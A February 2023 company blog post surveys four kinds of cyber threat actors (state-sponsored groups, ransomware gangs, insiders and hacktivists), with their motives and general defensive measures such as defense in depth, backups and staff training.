February 2023 Blog

A Brief Overview of Threat Actors


                  State-Sponsored           Organized Crime        Individuals/Insiders           Hacktivists

In 2023 we are likely to see the following types of Threat Actors:

  • State-Sponsored Groups
  • Organized Crime/Ransomware Groups
  • Individuals and/or Insiders
  • Hacktivist or Cause-Related Groups

Each of these type of threat actors have different motivations and sometimes methods. It is important to understand the objectives and techniques of each of these groups to allow companies to better prevent the attacks or at a minimum, remediate and recover from the specific attacks. For this month’s blog, I am leaning on an excellent LinkedIn article by Mr. Joe Clark, Security Program Manager at IBM Cloud (see https://www.linkedin.com/pulse/threat-actors-who-why-should-we-care-joe-clarke-cism-).

State-sponsored groups are a real and increasing threat in 2023. The objectives of such groups may be to gather foreign intelligence on security weaknesses, exfiltrate sensitive data (steal secrets) as well as create social tension and increase societal disruption (as was done by Russia during the recent US election). In some cases, as in the case of North Korea, we must also add the need for the state-sponsored threat actor to operate for financial gain by doing crypto-mining and/or seeking large payments for ransom in order to supplement their weak financial system and gain foreign currency. In other cases, state-sponsored threat actors seek to disrupt infrastructure in a target country because they have a medium/long-term goal of disrupting the economy and military preparedness of the victim. State-sponsored threat actors typically are very sophisticated, and their primary means is to gain a persistent and long-term presence on the victims’ systems. These threat actors often do extensive reconnaissance and will not hesitate to recruit insiders in a company who are motivated by personal financial gain. There are many types of sophisticated living-off-the-land fileless malware that are used by these type of threat actors and these are characterized by long dwell times and privilege escalation. The best prevention methods are using a multi-layered defense in depth with the willingness to do constant back-ups and immediate isolation and remediation of any infected systems.

Organized crime and/or ransomware groups typically are motivated by financial gain. They use a combination of opportunistic and targeted attacks either by doing extensive reconnaissance on a victim company or opportunistically and broadly attacking likely victims. The weapon of choice here is a phishing email and/or a malicious URL. They scan potential victims and seek unpatched or misconfigured systems for SQL injections and other such malicious actions. They will often threaten to post company sensitive information on the dark web to cause reputational damage in exchange for a ransom. They also lock a company’s networks and computers as a means of blackmailing a company to pay a ransom. The best defense against such threat actors is cybersecurity awareness training for the company’s staff and implementation of a good IT policy as well as IT hygiene. Again, having a reputable firewall, anti-virus and endpoint detection and response multi-layered solution is vital to preventing and catching these threats. These groups have significant financial resources at their disposal and can deploy malware that has been tested to bypass the firewall and AV; a defense in depth approach is key to improving a company’s cybersecurity posture against such threats. Reliable key data back-ups and contingency planning, along with regular crisis and incident response simulations are vital to remediating these type of attacks.

Individuals and/or insiders are amongst the most difficult types of threats to prevent. Typically an individual with a grievance or a lack of loyalty and/or a fervent desire to fund an extravagant lifestyle through illegal sources of income are all root causes of insider threats. Insiders may dwell inside your company for a considerable length of time. Insiders may exchange their usernames and passwords with either state-sponsored or criminal threat actors in exchange for financial gain. Insiders may be complicit with these threat actors for installation and management of crypto mining, for which they are paid. These insiders may delay, confuse, and sabotage your internal cybersecurity and defense in depth measures by being very reluctant to install defense measures and/or de-activating some or all of your preventative or remedial cybersecurity systems. Some insiders are content to exfiltrate sensitive data as an ‘insurance policy’ against their being made redundant. However, if an insider is an IT expert, then the threat is magnified many times as they can do significant long-term damage to the company. The best defense against insider threats are the development of good employee engagement and human resource policies, regular IT audits by external agencies such as external Vulnerability Assessment and Penetration Testing (VAPT) and asset inventories and, of course, implementation of a comprehensive IT/ IT hygiene policy.

Hacktivists or cause-related groups are a significant challenge as they are not typically motivated by financial gain but rather by seeking a platform for their cause. They may also be seeking to inflict reputational damage on a company they deem to be acting in a manner contrary to their cause. Sometimes these threat actors are also company insiders, and this can complicate the task of defending against them. Oftentimes, a company’s marketing, shareholder relations or senior management team can anticipate and defuse these threats by engaging in corporate planning for sustainability, corporate social responsibility, and community engagement. As far as the measures to prevent and /or mitigate these threats, the same advice as given for insiders applies.

In summary, knowing what kind of threat actor group is opposing you can yield insight into how to prevent, mitigate and/or remediate the specific type of threat. Cybersecurity is a team sport and you will need to work with your employees to educate and engage them to assist the company in implementing its defense in depth security posture.